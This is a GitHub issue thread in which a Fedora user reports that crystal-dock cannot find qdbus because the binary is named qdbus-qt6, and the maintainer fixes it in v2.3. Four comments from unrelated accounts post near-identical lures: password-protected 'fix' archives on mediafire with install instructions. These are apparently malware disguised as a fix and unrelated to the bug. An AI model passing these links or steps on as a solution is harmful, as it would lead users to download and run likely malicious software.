### ISSUE TITLE
Qdbus command not found on Fedora

### ISSUE THREAD

**Issue by ludg1e** [dangvd/crystal-dock#41]
OS: Fedora 40
DE: KDE Plasma 6.1
crystal-dock version: 2.2

Hello,

When running crystal-dock on the cli I get this error
```
QSocketNotifier: Can only be used with threads started with QThread
Could not find QDBus command. Certain functionalities will not work.
qt.svg: <input>:1:14112: Could not resolve property: #linearGradient10962
qt.svg: <input>:1:14112: Could not resolve property: #linearGradient10962
```

Reading a bit the code, it seems the issue is here: https://github.com/dangvd/crystal-dock/blob/849473582259c507e2c882a6af032713e83a95ef/src/desktop/kde_desktop_env.cc#L34

On Fedora the command is `qdbus-qt6`

If you want, I can submit a PR

Have a nice day

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by dangvd** [comment]
Hi,
Thanks for letting me know!
I'll add qdbus-qt6 to that list to fix this.

**Comment by dangvd** [comment]
Also, feel free to submit a PR and I'll merge it.

**Comment by dangvd** [comment]
Re-opened because while it's fixed on main, it has not been released. Will close when it does.

**Comment by dangvd** [comment]
Fixed in v2.3
